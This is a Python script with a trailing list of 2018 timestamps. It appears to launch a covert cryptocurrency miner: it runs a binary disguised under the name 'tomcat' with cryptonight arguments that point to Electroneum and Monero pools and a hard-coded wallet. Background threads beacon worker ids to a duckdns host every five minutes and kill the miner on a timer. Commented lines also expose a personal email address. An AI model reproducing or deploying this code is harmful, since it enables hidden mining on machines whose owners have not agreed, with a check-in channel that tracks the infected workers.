import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:05.407598
#2018-02-17 16:41:01.907138
#2018-02-17 18:28:04.141073
#2018-02-17 20:17:01.527742
#2018-02-17 22:04:07.104700
#2018-02-17 23:48:02.004601
#2018-02-18 01:37:05.955488
#2018-02-18 03:24:05.062413
#2018-02-18 05:12:04.612923
#2018-02-18 07:04:03.592114
#2018-02-18 08:52:01.454257
#2018-02-18 10:38:05.433957
#2018-02-18 12:23:01.460166
#2018-02-18 14:09:07.806127
#2018-02-18 15:59:06.673155
#2018-02-18 17:49:03.473408
#2018-02-18 19:35:07.632765
#2018-02-18 21:20:08.110914
#2018-02-18 23:08:02.228817
#2018-02-19 00:55:07.994853
#2018-02-19 02:42:06.977053
#2018-02-19 04:29:07.731460
#2018-02-19 06:14:05.157143
#2018-02-19 08:02:07.984796
#2018-02-19 09:52:01.758071
#2018-02-19 11:40:09.402382
#2018-02-19 13:28:01.408219
#2018-02-19 15:17:01.433168
#2018-02-19 17:04:05.507550
#2018-02-19 18:51:01.645567
#2018-02-19 20:40:07.364121
#2018-02-19 22:27:06.367876
#2018-02-20 00:13:06.132792
#2018-02-20 02:01:01.526059
#2018-02-20 03:51:04.648972
#2018-02-20 05:36:07.361721
#2018-02-20 07:21:01.748322
#2018-02-20 09:06:05.612770
#2018-02-20 10:49:06.920732
#2018-02-20 12:36:05.955752
#2018-02-20 14:23:06.180502
#2018-02-20 16:09:07.226522
#2018-02-20 17:54:01.273200
#2018-02-20 19:45:04.292273
#2018-02-20 21:34:04.360805
#2018-02-20 23:16:04.534921
#2018-02-21 01:00:09.907021
#2018-02-21 02:47:01.585477
#2018-02-21 04:32:01.610126
#2018-02-21 06:19:01.372711
#2018-02-21 08:05:08.136643
#2018-02-21 09:51:06.218726
#2018-02-21 11:39:06.053738
#2018-02-21 13:28:01.899792
#2018-02-21 15:13:05.913833
#2018-02-21 17:04:09.084737
#2018-02-21 18:51:07.432451
#2018-02-21 20:37:06.090080
#2018-02-21 22:22:06.973574
#2018-02-22 00:11:09.122440
#2018-02-22 01:58:01.335711
#2018-02-22 03:45:02.403501
#2018-02-22 05:31:07.811892
#2018-02-22 07:16:08.319384
#2018-02-22 09:03:09.461908
#2018-02-22 10:51:07.408702
#2018-02-22 12:37:01.691577
#2018-02-22 14:21:09.108861
#2018-02-22 16:09:04.243665
#2018-02-22 17:54:01.942847
#2018-02-22 19:42:03.665937
#2018-02-22 21:32:05.382439
#2018-02-22 23:19:05.613905
#2018-02-23 01:06:09.003424
#2018-02-23 02:53:06.365498
#2018-02-23 04:40:08.180747
#2018-02-23 06:26:05.295811
#2018-02-23 08:13:02.026831
#2018-02-23 10:31:01.284103
#2018-02-23 12:23:08.949610
#2018-02-23 14:12:07.247917
#2018-02-23 16:03:01.472135
#2018-02-23 17:47:05.489958
#2018-02-23 19:33:04.143263
#2018-02-23 21:16:04.422426
#2018-02-23 23:05:07.266919
#2018-02-24 00:56:02.280679
#2018-02-24 02:51:06.624059
#2018-02-24 05:29:06.338942
#2018-02-24 07:16:03.901763
#2018-02-24 09:05:07.692937
#2018-02-24 10:45:07.118083
#2018-02-24 12:31:06.391882
#2018-02-24 14:08:06.911063
#2018-02-24 15:47:05.373337
#2018-02-24 17:24:03.993391
#2018-02-24 18:55:01.660450
#2018-02-24 20:25:01.858970
#2018-02-24 21:55:07.767949
#2018-02-25 02:24:01.374647
#2018-02-25 05:59:06.210322
#2018-02-25 11:39:04.431629